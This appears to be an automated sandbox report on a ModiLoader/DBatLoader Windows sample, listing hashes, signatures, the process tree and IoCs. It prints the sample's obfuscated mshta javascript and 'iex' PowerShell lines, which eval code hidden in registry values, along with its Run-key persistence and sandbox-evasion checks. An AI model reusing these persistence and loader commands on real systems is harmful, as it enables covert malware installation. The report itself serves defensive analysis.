Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-09-2024 09:25
Static task
static1
Behavioral task
behavioral1
Sample
0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe
Resource
win10v2004-20240910-en
General
-
Target
0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe
-
Size
363KB
-
MD5
0098a6f7ff6d4fec1dd68c5490a832c6
-
SHA1
df77f212a2015b9bf7f731731bf97c2a3e9ff325
-
SHA256
31ddf76a482627ed6a16f2032e997ddc79621dd58de747ca2a1f5f730b8a1668
-
SHA512
ce80d0baf8270b0ef5e68c85e36881c82475a7756590b7e8191f3890480508b4d7374eee9a950b4b7dbd653fd56e959ea50bcaf0eb98b66a2ded97469df8fcb1
-
SSDEEP
6144:0e2N0dOCGzogTKULqOxmdK4ylktToPHVuIQHQeq2zhF9vCzsXZokGE:0e2N0drW3THLHmI4gkG9u5HTZZL
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2676 2568 mshta.exe 31 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
description ioc Process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 46 IoCs
resource yara_rule behavioral1/memory/2792-7-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/2792-24-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/2792-29-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/2792-31-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/2792-30-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/2792-25-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/2792-16-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/2792-28-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/2792-27-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/2792-26-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/2792-9-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/2792-19-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/2792-13-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/2792-32-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/1220-38-0x00000000060D0000-0x00000000061AA000-memory.dmp modiloader_stage2 behavioral1/memory/2176-39-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-40-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-70-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-69-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-68-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-67-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-66-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-65-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-64-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-63-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-62-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-60-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/1220-41-0x0000000002C90000-0x0000000004C90000-memory.dmp modiloader_stage2 behavioral1/memory/2176-59-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-58-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-57-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-56-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-55-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-54-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-53-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-52-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-51-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-50-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-49-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-48-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-47-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-46-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-45-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-44-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/2176-43-0x00000000002A0000-0x00000000003E7000-memory.dmp modiloader_stage2 behavioral1/memory/1220-42-0x00000000060D0000-0x00000000061AA000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
pid Process 2176 regsvr32.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0d5b0e3.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:t8tWR3nM=\"eXAHY3\";h9u=new%20ActiveXObject(\"WScript.Shell\");q46mfGh=\"C\";A7QIe=h9u.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\nxgspocl\\\\mjmgtqkw\");k0N0yA=\"BlxmUT\";eval(A7QIe);wzqE2MK=\"tXRY\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:AaHNK3g3=\"yF9D\";W1c2=new%20ActiveXObject(\"WScript.Shell\");Hx9LFYkQ=\"BCoYrjNP\";z6nFE5=W1c2.RegRead(\"HKCU\\\\software\\\\nxgspocl\\\\mjmgtqkw\");lF66TCz=\"Z0oAn\";eval(z6nFE5);SBeMd0RW=\"ShkT\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d18b531\\a17f468.lnk\"" regsvr32.exe -
pid Process 1220 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2764 set thread context of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 1220 set thread context of 2176 1220 powershell.exe 35 PID 2176 set thread context of 1784 2176 regsvr32.exe 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\5e2f06e\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\5e2f06e\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:u44dBE=\"xoUUsI\";K03P=new ActiveXObject(\"WScript.Shell\");ApxW5=\"DT\";idc0x4=K03P.RegRead(\"HKCU\\\\software\\\\nxgspocl\\\\mjmgtqkw\");RvHkn4=\"hPG3p8l\";eval(idc0x4);YGE80UJs=\"Gh\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\.7cdd11ba regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\.7cdd11ba\ = "5e2f06e" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\5e2f06e regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\5e2f06e\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\5e2f06e\shell\open regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1220 powershell.exe 1220 powershell.exe 1220 powershell.exe 1220 powershell.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe 2176 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1220 powershell.exe 2176 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1220 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2764 wrote to memory of 2792 2764 0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe 30 PID 2676 wrote to memory of 1220 2676 mshta.exe 33 PID 2676 wrote to memory of 1220 2676 mshta.exe 33 PID 2676 wrote to memory of 1220 2676 mshta.exe 33 PID 2676 wrote to memory of 1220 2676 mshta.exe 33 PID 1220 wrote to memory of 2176 1220 powershell.exe 35 PID 1220 wrote to memory of 2176 1220 powershell.exe 35 PID 1220 wrote to memory of 2176 1220 powershell.exe 35 PID 1220 wrote to memory of 2176 1220 powershell.exe 35 PID 1220 wrote to memory of 2176 1220 powershell.exe 35 PID 1220 wrote to memory of 2176 1220 powershell.exe 35 PID 1220 wrote to memory of 2176 1220 powershell.exe 35 PID 1220 wrote to memory of 2176 1220 powershell.exe 35 PID 2176 wrote to memory of 1784 2176 regsvr32.exe 36 PID 2176 wrote to memory of 1784 2176 regsvr32.exe 36 PID 2176 wrote to memory of 1784 2176 regsvr32.exe 36 PID 2176 wrote to memory of 1784 2176 regsvr32.exe 36 PID 2176 wrote to memory of 1784 2176 regsvr32.exe 36 PID 2176 wrote to memory of 1784 2176 regsvr32.exe 36 PID 2176 wrote to memory of 1784 2176 regsvr32.exe 36 PID 2176 wrote to memory of 1784 2176 regsvr32.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Users\Admin\AppData\Local\Temp\0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\0098a6f7ff6d4fec1dd68c5490a832c6_JaffaCakes118.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2792
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:IT4taI="PXO";l5R=new%20ActiveXObject("WScript.Shell");z5F8wl="NT8lxS";V76xrA=l5R.RegRead("HKCU\\software\\69mIxez6\\bXXeUr");Qi8BbBKF="8W6l";eval(V76xrA);I76MtbK="vXZEHpj";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:hmhqefk2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1784
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64B
MD55631af3676bc4d1af919fc749402b47d
SHA1a18273b2398d4fa429814800fcefe1112063e1c8
SHA25601eb69b1bf623b7c28230dd38538a5fe33a20becea260697224fd56d85707679
SHA5120cd9fa32d30b8758bf915f1b94a81cc7f311c92e6f365bcd2b0e1a56c55bdebaa6e65fecf703d33f824aeedc6df0d87be4e7ff3001c0e054ed6ce14ef2840d3a
-
Filesize
889B
MD59f3e76410b9fdeb577f49c17bb03f415
SHA1416804d79c550f600a919517966ab549276c6e82
SHA2565d737f685c4cee83f7407f500d82700e0cf7a9b8e0bbfcd78844d1ffef569cc8
SHA5125101245b7c31ab66f71bf4b66129cb1479d74157ca7c3b8e12237b1365713ee87e47d8fe7a6a4ab474e0fef41e37fbf43b100f9432846fb1a74d9c71a14f447a
-
Filesize
4KB
MD5b1484ed2115aef774d3502f468827c2e
SHA16b27704446a6946817d69b1ce03369e8e04c9eae
SHA25669fc400ab39d3b22489fcc0cd4a86d781c7823f6cf566d759b4f2613f2847ebc
SHA5129f2029143d667a21d4f3fe124d55ebead3d96c7fcd2ca7b5b01b9b3fd6d4bc16799ca34b58a7a757de4d2d3709766d3a825bd4c61d0ac74c7d8d1ab71f08ec25
-
Filesize
997B
MD5793331deb73c57e8a915a78c7f42afc6
SHA1372ad9e1704e093592b3bb4ec2b299ba903749e9
SHA256e24995f6b4c6f3c211c4e2ee338ccf9e05a9891f4fc18e025e74a05cbb8ae1d8
SHA51237a33fbae49a41edbd8af7c8f10cc69fca675627749cd297ae3dce73d6751c57b74a00761bf890a21a0b5ec47e133bf61376575309de2bdb7a6d78706c98e051
-
Filesize
25KB
MD5db12b1b15d1ab609fc400d58e8332141
SHA1a2298a3889b8f6ac941fd1ea940acac5fb8d6aa4
SHA256e4c91e3726514d347efd1334e624a661ba1e6d9245f3bd88e8c9ef2d0d8cbc0f
SHA51254b3750fc8a67532a7fa943d3cbf67bdd7041412b12371e61729bcf6ef9bddd44a5ff4cecedfe6d19f005823bb66bd8677ba5ed92106e419f932f3067295443d